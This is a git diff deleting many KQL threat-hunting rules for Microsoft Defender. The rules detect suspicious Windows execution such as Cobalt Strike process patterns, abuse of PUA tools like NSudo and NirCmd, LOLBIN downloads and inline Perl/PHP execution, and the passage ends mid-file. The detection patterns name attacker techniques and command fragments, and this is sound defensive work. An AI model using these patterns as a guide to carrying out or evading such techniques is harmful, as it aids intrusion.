b/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql deleted file mode 100644 index d47a865d..00000000 --- a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: CertainlyP -// Date: 2024/04/26 -// Level: high -// Description: Detects outbound network connection initiated by Microsoft Dialer. -The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. -This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" - -// Tags: attack.execution, attack.t1071.001 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql deleted file mode 100644 index 88e21026..00000000 --- a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2023/04/28 -// Level: medium -// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses -// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql b/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql deleted file mode 100644 index e7d4364e..00000000 --- a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018/12/27 -// Level: high -// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros -// Tags: attack.execution, attack.t1059, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/Execution/PCRE.NET_Package_Image_Load.kql b/Execution/PCRE.NET_Package_Image_Load.kql deleted file mode 100644 index 87180de7..00000000 --- a/Execution/PCRE.NET_Package_Image_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/29 -// Level: high -// Description: Detects processes loading modules related to PCRE.NET package -// Tags: attack.execution, attack.t1059 -DeviceImageLoadEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/Execution/PCRE.NET_Package_Temp_Files.kql b/Execution/PCRE.NET_Package_Temp_Files.kql deleted file mode 100644 index 0db1282d..00000000 --- a/Execution/PCRE.NET_Package_Temp_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/29 -// Level: high -// Description: Detects processes creating temp files related to PCRE.NET package -// Tags: attack.execution, attack.t1059 -DeviceFileEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql deleted file mode 100644 index 09b3d975..00000000 --- a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/01 -// Level: medium -// Description: Detect use of PDQ Deploy remote admin tool -// Tags: attack.execution, attack.lateral_movement, attack.t1072 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe" \ No newline at end of file diff --git a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql b/Execution/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/Execution/PUA_-_AdvancedRun_Execution.kql b/Execution/PUA_-_AdvancedRun_Execution.kql deleted file mode 100644 index 4e6050fc..00000000 --- a/Execution/PUA_-_AdvancedRun_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: medium -// Description: Detects the execution of AdvancedRun utility -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/Execution/PUA_-_CsExec_Execution.kql b/Execution/PUA_-_CsExec_Execution.kql deleted file mode 100644 index 8057d416..00000000 --- a/Execution/PUA_-_CsExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/22 -// Level: high -// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative -// Tags: attack.resource_development, attack.t1587.001, attack.execution, attack.t1569.002 -DeviceProcessEvents -| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec" \ No newline at end of file diff --git a/Execution/PUA_-_NSudo_Execution.kql b/Execution/PUA_-_NSudo_Execution.kql deleted file mode 100644 index a3bb925b..00000000 --- a/Execution/PUA_-_NSudo_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali -// Date: 2022/01/24 -// Level: high -// Description: Detects the use of NSudo tool for command execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe"))) \ No newline at end of file diff --git a/Execution/PUA_-_NirCmd_Execution.kql b/Execution/PUA_-_NirCmd_Execution.kql deleted file mode 100644 index 68200d1c..00000000 --- a/Execution/PUA_-_NirCmd_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/24 -// Level: medium -// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide ")) \ No newline at end of file diff --git a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql b/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql deleted file mode 100644 index d9debfcd..00000000 --- a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/24 -// Level: high -// Description: Detects the use of NirCmd tool for command execution as SYSTEM user -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where ProcessCommandLine contains " runassystem " \ No newline at end of file diff --git a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql deleted file mode 100644 index 9edcca22..00000000 --- a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: medium -// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines -// Tags: attack.execution, attack.lateral_movement, attack.t1072 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe" \ No newline at end of file diff --git a/Execution/PUA_-_RunXCmd_Execution.kql b/Execution/PUA_-_RunXCmd_Execution.kql deleted file mode 100644 index fc892f3c..00000000 --- a/Execution/PUA_-_RunXCmd_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/24 -// Level: high -// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec=" \ No newline at end of file diff --git a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql b/Execution/PUA_-_Wsudo_Suspicious_Execution.kql deleted file mode 100644 index 1282a6c6..00000000 --- a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/02 -// Level: high -// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) -// Tags: attack.execution, attack.privilege_escalation, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file diff --git a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql b/Execution/Parent_in_Public_Folder_Suspicious_Process.kql deleted file mode 100644 index 65b83f51..00000000 --- a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder -// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\" \ No newline at end of file diff --git a/Execution/Perl_Inline_Command_Execution.kql b/Execution/Perl_Inline_Command_Execution.kql deleted file mode 100644 index c6389427..00000000 --- a/Execution/Perl_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe") \ No newline at end of file diff --git a/Execution/Php_Inline_Command_Execution.kql b/Execution/Php_Inline_Command_Execution.kql deleted file mode 100644 index d4eeee8a..00000000 --- a/Execution/Php_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe") \ No newline at end of file diff --git a/Execution/Potential_Adplus.EXE_Abuse.kql b/Execution/Potential_Adplus.EXE_Abuse.kql deleted file mode 100644 index 680e85fa..00000000 --- a/Execution/Potential_Adplus.EXE_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: high -// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. -// Tags: attack.defense_evasion, attack.execution, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe") \ No newline at end of file diff --git a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql deleted file mode 100644 index 4d1541c8..00000000 --- a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe")) \ No newline at end of file diff --git a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql deleted file mode 100644 index 4d75232f..00000000 --- a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/11/03 -// Level: medium -// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. -Attackers can abuse this utility in order to download arbitrary files via a configuration file. -Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. - -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE") \ No newline at end of file diff --git a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql deleted file mode 100644 index e33493d3..00000000 --- a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: medium -// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals"))))) \ No newline at end of file diff --git a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql deleted file mode 100644 index 17de2322..00000000 --- a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/26 -// Level: medium -// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file -// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe") \ No newline at end of file diff --git a/Execution/Potential_CobaltStrike_Process_Patterns.kql b/Execution/Potential_CobaltStrike_Process_Patterns.kql deleted file mode 100644 index 03bf6e5d..00000000 --- a/Execution/Potential_CobaltStrike_Process_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/07/27 -// Level: high -// Description: Detects potential process patterns related to Cobalt Strike beacon activity -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql deleted file mode 100644 index e448ad48..00000000 --- a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Wojciech Lesicki -// Date: 2021/06/29 -// Level: high -// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. - -// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 -DeviceRegistryEvents -| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql b/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql deleted file mode 100644 index 026648ff..00000000 --- a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: xknow @xknow_infosec, Tim Shelton -// Date: 2020/06/11 -// Level: high -// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java")) \ No newline at end of file diff --git a/Execution/Potential_Cookies_Session_Hijacking.kql b/Execution/Potential_Cookies_Session_Hijacking.kql deleted file mode 100644 index 250526bc..00000000 --- a/Execution/Potential_Cookies_Session_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/27 -// Level: medium -// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql b/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql deleted file mode 100644 index 5451ccc8..00000000 --- a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Hieu Tran -// Date: 2023/03/13 -// Level: medium -// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet -// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll") \ No newline at end of file diff --git a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql b/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql deleted file mode 100644 index 33ee0fa7..00000000 